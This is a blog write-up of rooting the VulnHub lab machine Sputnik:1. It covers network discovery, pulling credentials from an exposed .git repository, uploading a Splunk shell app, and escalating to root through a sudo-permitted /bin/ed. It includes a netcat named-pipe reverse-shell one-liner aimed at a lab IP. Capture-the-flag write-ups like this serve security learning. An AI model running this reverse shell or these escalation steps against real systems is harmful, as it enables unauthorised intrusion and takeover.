19 July 2021
[VulnHub] Sputnik:1 WriteUp
I solved boot2root machine today.Machine level was easy. It was fun machine.Lets start
- ed (for root)
I detected target ip :
netdiscover -r 192.168.88.0/24 . Network adapterwas Nat mode.
And I did nmap scanning to see what happen is it have network side.
.git directory on port
55555 .Maybe I can find credential .
I looked for git directory deeply and I found repository address.
I downloaded the repo to my pc .And I searched the directory .
I decided to look logs . And I saw different tag :
I went to commit And I saw something like creds.
I tried the creds on login page and I could login.
When I logon the server I saw
splunk name and searched in google for how I get reverse shell.
I gone the first link and I did what there is wrights on readme page .
First one I downloaded
splunk_shells-1.2.tar.gz file for upload to page.I cliecked
install app from file .
I selected my file and uploaded .
I fixed permissions settings and I did for
All apps and saved .
I was need to call the page for get reverse shell and I wrote the line:
| revshell std my_ip my_port .
I got reverse shell with
nc .But the shell didnt work right so I was need to lead the another shell .
So I used the line :
rm /tmp/f;mkinfo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.88.128 1234 >/tmp/f .
This time worked correctly the shell.And I got connection.And started enumerating os.
I did my favorite enumeration
sudo -l . I found a command:
/bin/ed .Honestly I saw first time the command .
So I didnt know anything about that .
It was text editor. I googlied the command rapidly .I didnt find something but I remembered
the tool was like
vim .And I tried same thing When I use
vim and worked .I got root and read flag.
I liked the box .Because there was have
git and I saw
/bin/ed first time at least different thing.
Have a good hacks .See you next machines :)